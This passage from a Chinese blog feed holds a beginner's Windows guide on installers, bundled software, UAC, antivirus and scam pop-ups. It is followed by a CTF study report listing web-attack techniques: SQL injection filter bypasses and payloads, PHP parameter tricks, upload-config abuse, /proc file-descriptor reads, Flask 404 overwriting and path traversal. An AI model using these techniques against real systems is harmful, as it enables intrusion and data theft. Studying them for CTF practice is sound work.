href="#3-3-1-一个光秃秃的-exe-文件或者-msi-文件。" class="headerlink" title="3.3.1 A bare exe or msi file"></a>3.3.1 A bare exe or msi file</h4><p>Double-click the file to start the installer.</p><p><img src="https://bucketqiao123456.oss-cn-beijing.aliyuncs.com/image-20251126231153995.png" alt="image-20251126231153995"></p><h4 id="3-3-2-一个压缩包,例如-zip-或-rar-文件。"><a href="#3-3-2-一个压缩包,例如-zip-或-rar-文件。" class="headerlink" title="3.3.2 An archive such as a zip or rar file"></a>3.3.2 An archive such as a zip or rar file</h4><p>Extract the archive somewhere, then among the extracted files find a program named “setup.exe”, “install.exe” or similar and double-click it.</p><p><img src="https://bucketqiao123456.oss-cn-beijing.aliyuncs.com/image-20251126231220658.png" alt="image-20251126231220658"></p><h4 id="3-3-3-一个扩展名是-iso-的文件。"><a href="#3-3-3-一个扩展名是-iso-的文件。" class="headerlink" title="3.3.3 A file with the iso extension"></a>3.3.3 A file with the iso extension</h4><p>Right-click the iso file (a disc image), choose 【Open with】→【File Explorer】, and in the new window find and double-click a program named “setup.exe”, “install.exe” or similar.</p><p><img src="https://bucketqiao123456.oss-cn-beijing.aliyuncs.com/image-20251126231245195.png" alt="image-20251126231245195"></p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">As for “green” or “portable” software, there is no installation step at all.</span><br><span class="line">It is either a single exe file that you open and use,</span><br><span class="line">or an archive that works “out of the box”.</span><br></pre></td></tr></table></figure><p>Once the installer is running, following the 【Next】 prompts normally completes the installation. But stay alert here too! Having cleared the “high-speed downloader” hurdle, do not fall into the bundled-software pit. <strong>Some installers, just like “high-speed downloaders”, pre-tick options</strong> for bundled software, browser home pages and so on, and these options can appear at <strong>any stage</strong> of the installation. Untick them before clicking Next.</p><p><img src="https://bucketqiao123456.oss-cn-beijing.aliyuncs.com/image-20251126231426465.png" alt="image-20251126231426465"></p><p>Also choose the install directory: do not install to C:. Change it to D: as in the picture, or click 【Browse(R)】 and pick a folder you like.</p><p>Some installers are not of the “Next” kind and offer only an 【Install now】 button. In that case there is usually a 【Custom installation】 option to expand, where the install location can be changed.</p><p><img src="https://bucketqiao123456.oss-cn-beijing.aliyuncs.com/image-20251126231542466.png" alt="image-20251126231542466"></p><h3 
id="3-4-软件收费,破解和自由软件"><a href="#3-4-软件收费,破解和自由软件" class="headerlink" title="3.4 Paid software, cracks and free software"></a>3.4 Paid software, cracks and free software</h3><p>Much software has to be bought, including Windows itself. Common professional software, from Photoshop in graphic design, AutoCAD from the Autodesk family in engineering, and PyCharm in development, to the Word and PowerPoint we use every day, all has to be paid for. The picture shows the purchase page for genuine Photoshop (“PS”): priced at 888 yuan a year.</p><p><img src="https://bucketqiao123456.oss-cn-beijing.aliyuncs.com/image-20251127101855697.png" alt="image-20251127101855697"></p><p>In real life most of us are, to some degree, “freeloading” this software without paying. That is because the copies we use have been “cracked”. Broadly, the cracked software circulating online takes two forms:</p><p>• Paid software that has been fully cracked: the program has been modified, and the installer is usually homemade by someone in the community.</p><p>• The trial version of the paid software installed normally, plus a “crack patch”, which “patches” the official program into believing the user has paid and unlocks every feature.</p><p>Using cracked software is, in the end, nothing to be proud of. If you use it privately for personal use or study, the vendor may not come after you.</p><p><strong>But if you use cracked (that is, pirated) software commercially, it is only a matter of time before you are pursued.</strong></p><p>There is also a security cost hidden behind the licensing question: a “crack patch” or repackaged installer is by definition a modified executable from an unknown party, a common carrier of malware, and its instructions usually begin with “turn off your antivirus”. Free and open-source alternatives carry neither risk.</p><h3 id="3-5-【安全下载】到底下载了什么"><a href="#3-5-【安全下载】到底下载了什么" class="headerlink" title="3.5 What does 【Safe download】 actually download?"></a>3.5 What does 【Safe download】 actually download?</h3><p><strong>Do not try running executables of unknown origin on your own computer!</strong></p><p>In the OBS Studio download demonstrated above, choosing 【Safe download】 yields this executable of only about 20 MB:</p><p><img src="https://bucketqiao123456.oss-cn-beijing.aliyuncs.com/image-20251127102220177.png" alt="image-20251127102220177"></p><p>Double-clicking it makes Windows show the dialog in Figure 3.24 of the original, asking 【Do you want to allow this app to make changes to your device?】. This is the “UAC prompt”, covered in detail in the next chapter on basic maintenance and protection.</p><p>Suppose we take this executable for the OBS Studio installer and confidently click 【Yes】. A progress bar like Figure 3.25 of the original appears, apparently installing OBS Studio for us...</p><p><img src="https://bucketqiao123456.oss-cn-beijing.aliyuncs.com/image-20251127102300205.png" alt="image-20251127102300205"></p><p>This kind of prompt is the program asking for the highest level of permission on the computer (administrator rights) in order to run.</p><p><img src="https://bucketqiao123456.oss-cn-beijing.aliyuncs.com/image-20251127102337544.png" alt="image-20251127102337544"></p><p>But the bottom-left corner of the window hints that things are not so simple. The program is not installing OBS Studio; it is installing “✕✕ Manager” and changing the browser home page to “Safe Navigation”. When the installation finishes there are new things on the desktop: the real 133 MB OBS Studio, which we could have got directly via 【General network download】, and the freshly installed “✕✕ Manager”, whose icon closely resembles the Microsoft Store.</p><p><img src="https://bucketqiao123456.oss-cn-beijing.aliyuncs.com/image-20251127102449655.png" 
alt="image-20251127102449655"></p><p>More dangerous still: we have no idea whether the bundled programs will go on silently installing yet more unwanted software without our knowledge. Before the March 2022 “3·15 Gala” crackdown on such practices, the behaviour of a “光速下载器” (Lightspeed Downloader) obtained from a similar site was recorded. On its interface, four bundled-software checkboxes on the right are ticked by default:</p><p><img src="https://bucketqiao123456.oss-cn-beijing.aliyuncs.com/image-20251127102601277.png" alt="image-20251127102601277"></p><p>What happens if we do not untick them?</p><p>The following was done inside a virtual machine.</p><p><strong>Do not imitate!!!</strong></p><p><img src="https://bucketqiao123456.oss-cn-beijing.aliyuncs.com/image-20251127102658252.png" alt="image-20251127102658252"></p><h2 id="第四章-基本维护和安全防护"><a href="#第四章-基本维护和安全防护" class="headerlink" title="Chapter 4 Basic maintenance and security"></a>Chapter 4 Basic maintenance and security</h2><p>This chapter answers questions such as:</p><p>How do I uninstall software I don't want? Why does the system keep asking “do you want to allow this app to make changes to your device” when I open some programs? Why is the computer “updating” every day? Antivirus, Security Center, PC Manager: which should I use? With so much nastiness online, how do I keep clean?</p><h3 id="4-1-软件的卸载"><a href="#4-1-软件的卸载" class="headerlink" title="4.1 Uninstalling software"></a>4.1 Uninstalling software</h3><p>Uninstalling is the reverse of installing: besides deleting the software's own files, it undoes changes written into the system, removes file associations, and so on.</p><p>So uninstalling must go through the uninstaller the software provides. It is not a matter of finding the install folder and deleting everything in it, and certainly not of deleting the desktop shortcut.</p><p>On Windows 11, ordinary software is uninstalled as follows.</p><p>Open Settings:</p><p><img src="https://bucketqiao123456.oss-cn-beijing.aliyuncs.com/image-20251127103107057.png" alt="image-20251127103107057"></p><p>Wait a moment for the list to load fully. It shows every program installed on the computer. Find the one you don't want and click 【Uninstall】 twice:</p><p><img src="https://bucketqiao123456.oss-cn-beijing.aliyuncs.com/image-20251127103137746.png" alt="image-20251127103137746"></p><p><img src="https://bucketqiao123456.oss-cn-beijing.aliyuncs.com/image-20251127103144230.png" alt="image-20251127103144230"></p><p>then follow the prompts to finish.</p><p><strong>But</strong></p><p>be especially careful: <strong>some uninstallers are convoluted and crammed with irrelevant options (such as 【Think again】 and 【Reinstall】)</strong>, so click with care. Some even try to talk you into installing a different program after the uninstall completes.</p><p><img src="https://bucketqiao123456.oss-cn-beijing.aliyuncs.com/image-20251127103249606.png" alt="image-20251127103249606"></p><p>Some programs tell you after uninstalling that a restart is needed for final cleanup; choose whether to restart now or later.</p><h3 id="4-2-应用的权限以及UAC弹窗"><a href="#4-2-应用的权限以及UAC弹窗" class="headerlink" title="4.2 Application permissions and the UAC prompt"></a>4.2 Application permissions and the UAC prompt</h3><p>This section gives a brief introduction to the Windows 
permission model. When a program starts it is granted only limited rights: it cannot change key system settings, install new software, or touch critical data.</p><p>For most programs that is enough; they only need to read and write their own files and help the user get work done.</p><p><strong>But</strong> in some special cases these limited rights are not enough:</p><p>An <strong>installer</strong>'s whole job is to install new software, which limited rights forbid.<br>Some <strong>professional software</strong> needs to hook into system-level components to work, which limited rights forbid.<br>“<strong>System optimisation</strong>” software exists to change system settings, which limited rights forbid.</p><p>In such cases the program must raise its rights to do its job; this is called “elevation”. The prompt (“Do you want to allow this app to make changes to your device?”, the “UAC prompt”) is the system asking the user when a program requests elevation.</p><p><img src="https://bucketqiao123456.oss-cn-beijing.aliyuncs.com/image-20251127103703462.png" alt="image-20251127103703462"></p><p>What is the point of the UAC prompt? Imagine this: a “seed” left behind by some junk program wants to install a set of malware on your computer. By default that seed does not have the rights, so its plan is crushed on the spot: without elevated rights it cannot install software.</p><p>This tells us an important fact: if an unexpected UAC prompt appears, refuse it, always. The prompt itself helps you decide: it names the program and its publisher, and a yellow banner with “Publisher: Unknown” for something you did not just launch is exactly the case for 【No】.</p><h3 id="4-3-合理使用杀毒软件和安全软件"><a href="#4-3-合理使用杀毒软件和安全软件" class="headerlink" title="4.3 Using antivirus and security software sensibly"></a>4.3 Using antivirus and security software sensibly</h3><p>Used sensibly, antivirus and security software (together, “security software” below) protect your computer; used badly, they wreck the experience of using it.</p><p>We do not recommend any particular product here; instead we describe some reasonably sensible ways of using this class of software.</p><p>Domestic products include 360 安全卫士, 火绒安全软件 and 瑞星杀毒软件; foreign ones include Kaspersky and Norton. Windows also ships with “Windows Security” (formerly “Windows Defender”), which itself provides strong virus protection and other security features.</p><p><img src="https://bucketqiao123456.oss-cn-beijing.aliyuncs.com/image-20251127103940177.png" alt="image-20251127103940177"></p><p>First, <strong>never have more than one antivirus product installed at the same time</strong>.</p><p>For example, if 360 安全卫士 is installed, do not also install 火绒安全软件 or similar. Doing so is not just pointless: their real-time scanners compete for the same hooks and flag and fight each other (it is like raising gu, poisons left to fight it out in a jar). Windows Security's own antivirus switches itself off when a third-party antivirus registers with the system, so it does not count against this rule.</p><p>Second, <strong>beware of the “family bucket”</strong>.</p><p>Big vendors all want users to adopt their whole product line. Tencent PC Manager, for instance, pushes users in every possible way to install a whole set of Tencent products, including but not limited to QQ Browser, QQ Games and Tencent Desktop Organizer.</p><p>Most of the time, though, we only wanted one security or antivirus product to protect the computer. One moment of inattention, one tick left in some obscure corner, and the rest arrives too.</p><p><img src="https://bucketqiao123456.oss-cn-beijing.aliyuncs.com/image-20251127104137202.png" alt="image-20251127104137202"><br>We install security software to protect the computer, not to have it slow the machine down. So it needs some “taming” before it serves us well.</p><p>Concretely, turn off the useless features and prompts: the boot-time message at every start-up, the intrusive “one-click boost” ball on the desktop, the “news” pop-up ads, the “you might like” search box, and so on.</p><h3 id="4-4-Windows-更新——让人又爱又恨的“更新”"><a href="#4-4-Windows-更新——让人又爱又恨的“更新”" class="headerlink" title="4.4 
Windows Update, the update everyone loves to hate"></a>4.4 Windows Update, the update everyone loves to hate</h3><p>Windows is updated constantly. “Update” here does not mean major version upgrades such as from Windows 7 to Windows 10, but the “Windows Update” that every so often keeps us from shutting down and going to bed.</p><p>Open Settings; in Windows 10 choose 【Update &amp; Security】, in Windows 11 【Windows Update】, and you will see the currently available updates and their status.</p><p><img src="https://bucketqiao123456.oss-cn-beijing.aliyuncs.com/image-20251127104414176.png" alt="image-20251127104414176"></p><p>Windows Update ought to be universally loved, but it is not.</p><p>Besides keeping us from shutting down, Windows Update carries some risk: stories of running Windows Update one evening and finding the computer unable to boot the next morning are far from rare.</p><p>But we should not give up eating for fear of choking, especially when choking is so rare. In fact, most cases of a system damaged by Windows Update come from the user interrupting the update by hand, not from Windows Update itself. And updates are how security fixes arrive, which is the main reason not to keep postponing them.</p><p>So what we need to do is treat Windows Update properly and not interrupt it. During an update the screen keeps telling you “do not turn off your computer”. While Windows Update is in progress we strongly recommend keeping the computer (including a laptop, even though it has a battery, even if that battery is fully charged) connected to mains power and not closing the laptop lid, so that the system can finish the whole update “undisturbed”.</p><h3 id="4-5-远离恶意软件(流氓软件)"><a href="#4-5-远离恶意软件(流氓软件)" class="headerlink" title="4.5 Stay away from malware (“rogue software”)"></a>4.5 Stay away from malware (“rogue software”)</h3><p>“Rogue software” means software that tricks users into downloading and installing other software, spreads aggressively, and is hard to uninstall.</p><p>Malware is contagious: one piece may bundle-install five more, and each of those can bundle more of the same kind. What you end up with is a computer that has been “wrecked”.</p><p><img src="https://bucketqiao123456.oss-cn-beijing.aliyuncs.com/image-20251127104714721.png" alt="image-20251127104714721"></p><p>If you find software on your computer that appeared out of nowhere, uninstall it. Usually the normal uninstall procedure works. <strong>But watch out for bundled ticks during the uninstall.</strong></p><p>Below is a list of programs we have found to be frequently bundle-installed by malware. If you discover them on your computer without having installed them, be on guard: uninstall them and audit every program installed on the machine.</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line">The “2345” family: “2345 浏览器”, “2345 好压”, “2345 电脑管家”, “2345 看图王” and others.</span><br><span class="line">Compression tools such as “快压”, “巧压”, “微压”, “布丁压缩” and “52 好压”.</span><br><span class="line">PDF viewers such as “飞速 PDF”, “小树 PDF”, “熊猫 PDF” and “极光 PDF”.</span><br><span class="line">News pop-up software such as “新速头条”.</span><br><span class="line">Small utilities such as “小黑记事本”.</span><br><span 
class="line">“布丁桌面”“海螺桌面”“火萤视频桌面”等“桌面”类软件。</span><br><span class="line">“手机模拟大师”“Steam 游戏助手”“Steam 管家”“傲视霸主”等游戏类软件。</span><br></pre></td></tr></table></figure><h3 id="4-6-警惕“电信诈骗”"><a href="#4-6-警惕“电信诈骗”" class="headerlink" title="4.6 警惕“电信诈骗”"></a>4.6 警惕“电信诈骗”</h3><p><strong>注意</strong></p><p>这里的电信诈骗并不是你平时听到的电信诈骗,因此请认真阅读本节内容</p><p>众所周知,现在勒索病毒横行。如果你没安装什么危险软件,但某天在上网时,电脑突然弹出了这样的“对话框”,你的第一反应是什么呢?</p><p><img src="https://bucketqiao123456.oss-cn-beijing.aliyuncs.com/image-20251127105055883.png" alt="image-20251127105055883"></p><p>尽管这个“对话框”看起来像是系统弹出的警报,但它实际上是 Chrome 浏览器发出的一个<strong>网页通知</strong></p><p>这种通知称为**“恶意浏览器通知”**,本质是一种“电信诈骗”。<strong>如果我们点击了这个通知的任何位置,就会打开一个含有恶意软件或代码的网站</strong>直接进了对方的圈套</p><p><img src="https://bucketqiao123456.oss-cn-beijing.aliyuncs.com/image-20251127105154833.png" alt="image-20251127105154833"></p><p>类似的电信诈骗还包括“你的支付账户已经泄露”“你涉嫌违法已被起诉”等等</p><p>**如何鉴别这种电信诈骗通知呢?**首先,几乎所有浏览器在网站要求发送通知时,都会明确询问用户是否接收该网站的通知,除了那些包含邮件、聊天功能的动态网站外,我们不应该随意允许其他网站发送通知。这样就能从根本上减少遭遇这种电信诈骗的可能性。</p><p><img src="https://bucketqiao123456.oss-cn-beijing.aliyuncs.com/image-20251127105242706.png" alt="image-20251127105242706"></p><p>其次,当电脑上弹出任何可疑的窗口时,我们都要保持警惕。作为一个浏览器,Chrome 本身绝不会弹出类似“电脑中存在病毒”这样的警告信息。同时,当我们遇到“你的支付账户泄露”甚至是“你涉嫌违法”时,都应当仔细思考一下——银行或警方真的会用这样的方式来通告我们吗?</p><p>我们只需要学会<strong>保持冷静,理性分析,识别出嫌疑网站</strong>并将之关闭,就能有效防止自己遭受真正的损失</p><h2 id="第五章-遇到问题怎么办"><a href="#第五章-遇到问题怎么办" class="headerlink" title="第五章 遇到问题怎么办"></a>第五章 遇到问题怎么办</h2><p>本章需要解决</p><p>问题是怎么产生的?遇到问题想找别人帮助,怎么样有效地向别人提问?找不到人提问,怎样有效地上网查找解决方案?</p><h3 id="5-1-为什么电脑会时不时地出现问题"><a href="#5-1-为什么电脑会时不时地出现问题" class="headerlink" title="5.1 为什么电脑会时不时地出现问题"></a>5.1 为什么电脑会时不时地出现问题</h3><p>所谓“遇到问题”,打不开、崩溃、打开后崩溃、特定功能无法使用、无响应(俗称“卡死”)等。遇到问题的原因是十分多样的,但大体来说,可以分成三种:<strong>软件本身存在问题、软件运行的环境不合适,以及我们自己的操作不当</strong></p><h4 id="5-1-1-软件本身的问题"><a href="#5-1-1-软件本身的问题" class="headerlink" title="5.1.1 软件本身的问题"></a>5.1.1 软件本身的问题</h4><p>有时候,我们使用的软件本身就存在问题:由于软件设计者考虑不周,软件中存在设计有缺漏的地方,而这些地方恰巧被我们给碰上了,于是出现了我们意料之外的情况</p><figure class="highlight 
plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">比如,曾经某些版本的 QQ 因处理消息机制的缺陷,在接收到包含特定字符的消息后会直接崩溃;</span><br><span class="line">微信也出现过类似问题,用户在收到含</span><br><span class="line">有特定二维码的图片时,应用会无故退出。</span><br><span class="line">这些问题非普通用户所能解决,若遇到这些情况</span><br><span class="line">我们只能耐心等待软件开发商发布更新版本来修复问题。</span><br></pre></td></tr></table></figure><h4 id="5-1-2-运行环境不合适"><a href="#5-1-2-运行环境不合适" class="headerlink" title="5.1.2 运行环境不合适"></a>5.1.2 运行环境不合适</h4><p>这种情况下,软件没有问题,我们的操作也没有问题,问题出在“不合适的环境”。</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">例如,某个软件A 可能需要系统版本至少是 B 但不能高过 C,而且需要电脑上安装了 D 和 E。</span><br><span class="line">一旦这一串条件中有一个不满足,软件 A 可能就无法正常工作</span><br></pre></td></tr></table></figure><p>特别地,在电脑中存在一种特殊的软件,叫做“运行库”。</p><p>这种软件自身并没有任何实际功能,但许多别的软件需要依赖它的辅助才能工作。</p><p>运行库是一种“你平常感知不到,但没有就是不行”的存在:<br>如果电脑缺少运行库,很多软件就不能正常打开,或在运行时报错</p><p><img src="https://bucketqiao123456.oss-cn-beijing.aliyuncs.com/image-20251127110102804.png" alt="image-20251127110102804"></p><h4 id="5-1-3-操作不当"><a href="#5-1-3-操作不当" class="headerlink" title="5.1.3 操作不当"></a>5.1.3 操作不当</h4><p>这种情况下,软件没有问题,而我们操作不当。例如,我们在设置软件的时候遗漏了某些关键步骤,从而造成了问题。</p><p>受限于篇幅和我们的精力,本文是不可能在一章之中总结完所有在电脑使用过程中可能遇到的问题的。</p><p>接下来,我们会介绍“提问”的方法——我们应当充分利用人脉和互联网等等资源,来帮助我们解决问题。而“提问”正是我们利用这些资源的手段</p><h3 id="5-2-提问的艺术"><a href="#5-2-提问的艺术" class="headerlink" title="5.2 提问的艺术"></a>5.2 提问的艺术</h3><p>提问并非一件轻松的事,而是一门<strong>需要技巧</strong>的艺术。有效的提问,至少要让对方了解以下几点:</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">•“我”遇到了什么?</span><br><span 
class="line">•“我”是如何让这种状况产生的?</span><br><span class="line">•“我”想要什么?</span><br></pre></td></tr></table></figure><p>因此就是要<strong>尽量准确提供更多的信息</strong></p><p>举个例子:如果你发现自己明明将文件成功拷入了 U 盘中,但是将 U 盘插入其他电脑上时,却不能找到相应的文件。</p><p>一个好的提问是:</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">我确定我成功将文件拷贝到了我的 U 盘里面,但我把 U 盘插入其他电脑时,找不到这些文件。请问为什么会这样?</span><br></pre></td></tr></table></figure><p>当然,在请求他人帮助时还应该遵循基本的社交礼仪。这些东西我们不再赘述</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">问题实在解决不了又不好意思找别人的,那就来找作者吧</span><br><span class="line">Fisssssh的QQ号是3471914563()</span><br></pre></td></tr></table></figure><h3 id="5-3-善用“搜索引擎”和“网络平台”"><a href="#5-3-善用“搜索引擎”和“网络平台”" class="headerlink" title="5.3 善用“搜索引擎”和“网络平台”"></a>5.3 善用“搜索引擎”和“网络平台”</h3><p>百度、必应、搜狗这样的“搜索引擎”,以及诸如哔哩哔哩、<br>CSDN、小红书都是很好的解决问题的途径</p><h4 id="5-3-1-找准问题的关键词"><a href="#5-3-1-找准问题的关键词" class="headerlink" title="5.3.1 找准问题的关键词"></a>5.3.1 找准问题的关键词</h4><p>在搜索相关信息时,除开软件的名字,这些提示信息和错误代码就是最重要的关键词。例如,关键词就是提示信息中的出错文件 vrayvrmatmtl2014.dlt 以及错误代码 126 - 找不到指定的模块 </p><p><img src="https://bucketqiao123456.oss-cn-beijing.aliyuncs.com/image-20251127110911486.png" alt="image-20251127110911486"></p><p>当然,发生问题的<strong>软件名称和版本同样很重要</strong>。仅凭一个错误信息,你可能会找到有同一个错误代码的来自不同软件的不同问题</p><p><img src="https://bucketqiao123456.oss-cn-beijing.aliyuncs.com/image-20251127111425790.png" alt="image-20251127111425790"></p><p><img src="https://bucketqiao123456.oss-cn-beijing.aliyuncs.com/image-20251127111436956.png" alt="image-20251127111436956"></p><h4 id="5-3-2-用英文搜搜看"><a href="#5-3-2-用英文搜搜看" class="headerlink" title="5.3.2 用英文搜搜看"></a>5.3.2 用英文搜搜看</h4><p>得益于互联网的全球性,当我们遇到电脑问题时,还可以尝试在国际化的搜索引擎和网络平台,比如“必应”(<a 
href="https://cn.bing.com/%EF%BC%89%E4%B8%8A%EF%BC%8C%E7%94%A8%E8%8B%B1%E8%AF%AD%E6%90%9C%E7%B4%A2%E7%9B%B8%E5%85%B3%E7%9A%84%E8%B5%84%E6%96%99%E3%80%82%E5%BD%93%E9%97%AE%E9%A2%98%E5%87%BA%E7%8E%B0%E5%9C%A8%E5%A4%96%E5%9B%BD%E5%BC%80%E5%8F%91%E8%80%85%E6%89%80%E7%BC%96%E5%86%99%E7%9A%84%E8%BD%AF%E4%BB%B6%E4%B8%8A%E6%97%B6%EF%BC%8C%E8%BF%99%E7%A7%8D%E5%81%9A%E6%B3%95%E5%BE%80%E5%BE%80%E8%83%BD%E6%9B%B4%E5%BF%AB%E6%89%BE%E5%88%B0%E7%BB%93%E6%9E%9C">https://cn.bing.com/)上,用英语搜索相关的资料。当问题出现在外国开发者所编写的软件上时,这种做法往往能更快找到结果</a></p><h4 id="5-3-3-问问AI吧"><a href="#5-3-3-问问AI吧" class="headerlink" title="5.3.3 问问AI吧"></a>5.3.3 问问AI吧</h4><p>ai可以是一种办法,但是不提倡过度依赖</p><p>如果我们的问题并非十分常见,AI 也没怎么“见过”这样的问题,那么它就会东拼西凑、胡编乱造了。</p><h2 id="第六章-好用的快捷键"><a href="#第六章-好用的快捷键" class="headerlink" title="第六章 好用的快捷键"></a>第六章 好用的快捷键</h2><h3 id="6-1-windows键相关"><a href="#6-1-windows键相关" class="headerlink" title="6.1 windows键相关"></a>6.1 windows键相关</h3><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">这部分内容真的很有用</span><br><span class="line">我就直接照搬了吧(绝对不是因为我懒)</span><br></pre></td></tr></table></figure><p><img src="https://bucketqiao123456.oss-cn-beijing.aliyuncs.com/image-20251127111811581.png" alt="image-20251127111811581"></p><p><img src="https://bucketqiao123456.oss-cn-beijing.aliyuncs.com/image-20251127111823395.png" alt="image-20251127111823395"></p><p><img src="https://bucketqiao123456.oss-cn-beijing.aliyuncs.com/image-20251127111834929.png" alt="image-20251127111834929"></p><h3 id="6-2-CTRL相关"><a href="#6-2-CTRL相关" class="headerlink" title="6.2 CTRL相关"></a>6.2 CTRL相关</h3><p><img src="https://bucketqiao123456.oss-cn-beijing.aliyuncs.com/image-20251127111903439.png" alt="image-20251127111903439"></p><p><img src="https://bucketqiao123456.oss-cn-beijing.aliyuncs.com/image-20251127111918529.png" alt="image-20251127111918529"></p><h3 id="6-3-ALT-相关"><a href="#6-3-ALT-相关" 
class="headerlink" title="6.3 ALT 相关"></a>6.3 ALT 相关</h3><p><img src="https://bucketqiao123456.oss-cn-beijing.aliyuncs.com/image-20251127111943866.png" alt="image-20251127111943866"></p><p>尝试把它们融入到你的日常使用之中吧</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">甚至Fisssssh在写这篇博客的时候用的最多的快捷键是CTRL+C&V()</span><br></pre></td></tr></table></figure>]]></content>
</entry>
<entry>
<title>UKY Weekly Report (complete)</title>
<link href="/2025/11/23/UKY%E5%91%A8%E6%8A%A5/"/>
<url>/2025/11/23/UKY%E5%91%A8%E6%8A%A5/</url>
<content type="html"><![CDATA[<h1 id="10-27–11-2周"><a href="#10-27–11-2周" class="headerlink" title="10.27–11.2周"></a>10.27–11.2周</h1><h3 id="本周复现了newstar2024的week1-week3,并且做了六道buu的题目,php代码审计偏多"><a href="#本周复现了newstar2024的week1-week3,并且做了六道buu的题目,php代码审计偏多" class="headerlink" title="本周复现了newstar2024的week1-week3,并且做了六道buu的题目,php代码审计偏多"></a>本周复现了newstar2024的week1-week3,并且做了六道buu的题目,php代码审计偏多</h3><p> 对之前较为模糊的知识点进行了补充,如php伪协议,cookie的组成和部分php代码绕过等<br> 1.如果直接传参名 NewStar_CTF.2024会发现并没有用。这是由 NewStar_CTF.2024 中的特殊字符 . 引起的,PHP 默认会将其解析为 NewStar_CTF_2024。可以使用 [ 字符的非正确替换漏洞。当传入的参数名中出现 [ 且之后没有 ] 时,PHP 会将 [ 替换为 _,但此之后就不会继续替换后面的特殊字符了因此,GET 传参 NewStar[CTF.2024即可<br> 2.在git泄露类型题中,开发者会使用 git stash 来暂存未提交的更改。这些更改存储在 .git/objects 中,可以被恢复。在cd到指定的目录下,恢复出的仓库中,使用 git stash list 查看暂存列表。使用 git stash apply 应用暂存,查看暂存的内容。git stash pop还原文件<br> 3.cmd里type读取文件内容,斜杠换成反斜杠,文件名加双引号<br> 4.有时候在传Base64 加密后的字符串时会报错,是因为不能带有=,会被waf,这时直接删掉结尾等号即可,后者在明文后面多加一些空格以使加密结果不带等号,若最后是+的话,我们在GET传参必须将其编码为 %2B,不然+会被视作空格<br> 5.如果有类似闯关的题目,下一关出不来的时候可以试试更新一下cookie(),如果要修改,需要拿到key之后去jwt修改后传入<br> 6.nc (Netcat),直接与服务器进行通信,不加其他的东西,逐字节发送和接收数据,有时候nc类题目中某些文字显示乱码,可以使用nc直接连接<br> 7.在题目中需要要求文件内容,如file_get_contents($text,’r’)===”welcome to the zjctf”时,可以用url写data协议直接提供内容,无需创建文件,语法data://text/plain,welcome to the zjctf</p><h3 id="本周总结:学到了之前没有接触过的知识点stash,python沙盒逃逸,jwt改cookie等-补习了一下之前了解不够牢靠的部分知识点"><a href="#本周总结:学到了之前没有接触过的知识点stash,python沙盒逃逸,jwt改cookie等-补习了一下之前了解不够牢靠的部分知识点" class="headerlink" title="本周总结:学到了之前没有接触过的知识点stash,python沙盒逃逸,jwt改cookie等,补习了一下之前了解不够牢靠的部分知识点"></a>本周总结:学到了之前没有接触过的知识点stash,python沙盒逃逸,jwt改cookie等,补习了一下之前了解不够牢靠的部分知识点</h3><p> 另外检讨一下,这周光顾打洲了,没做多少题()<br> 下周学习计划:争取复现完newstar2024所有题目,了解一下服务器监听,污染404页面等</p><h1 id="11-3–11-9周"><a href="#11-3–11-9周" class="headerlink" title="11.3–11.9周"></a>11.3–11.9周</h1><h3 id="本周复现完毕newstar2024全部题目,week4-5做下来整体感觉偏难但是5反而比4简单(),buu做了5道题,极客大挑战做了3道,学到了很多新知识点。"><a href="#本周复现完毕newstar2024全部题目,week4-5做下来整体感觉偏难但是5反而比4简单(),buu做了5道题,极客大挑战做了3道,学到了很多新知识点。" class="headerlink" 
title="本周复现完毕newstar2024全部题目,week4-5做下来整体感觉偏难但是5反而比4简单(),buu做了5道题,极客大挑战做了3道,学到了很多新知识点。"></a>本周复现完毕newstar2024全部题目,week4-5做下来整体感觉偏难但是5反而比4简单(),buu做了5道题,极客大挑战做了3道,学到了很多新知识点。</h3><p> ps:学的有点杂,大部分还是对之前的知识点的补充和深入了解。<br> 1.sql注入过滤空格就用()将内容包裹起来,如select(table_name)from(information_schema.tables)<br> 过滤=就用like替代,过滤by union等说明过滤了联合注入,需要采用报错注入,(extractvalue(1, concat(0x7e, (select database())))),直接报错,并且回显到后面检测的数据库的原理继续注入<br> 2.文件上传类有时不会把文件自动解析成php,就需要用htaccess更改服务器配置,.htaccess被禁用可以尝试.user.ini<br> 3.本地文件读取,在对读取文件有长度限制,且通配符不可使用的情况下,应该采用文件描述符来读取目的文件,文件描述符是操作系统为进程维护的一个整数,每个进程有一个fd表,如/proc/self/fd/3,不行就往后试()<br> 4.md5两次后是0e…..纯数字的是179122048<br> 5.sql注入中select句段被禁用,可以尝试堆叠注入,同时可以使用handler命令直接读取表中的数据,例如语法:1’;HANDLER 表名 OPEN;HANDLER 表名 READ NEXT;HANDLER 表名 CLOSE;#根据题目类型插入布尔盲注或其他注入类型<br> 6.在严格过滤的环境下获取flag,在得知flag文件名称的情况下,无法通过正常方法直接访问得到,可以尝试污染404页面,例:在flask中可以使用setattr(NotFound, ‘description’, command_result)动态修改404页面的描述内容,再跟上执行命令获取flag,将flag命令回显到404页面<br> 7.目录穿越,利用Flask框架静态文件路由的潜在缺陷,绕过目录限制/../来读取目录,需要注意的是,直接在url中访问并不会成功,因为无法对其进行正确解析,使用burpsuite等改请求来访问目标目录,进而读取到源码<br> 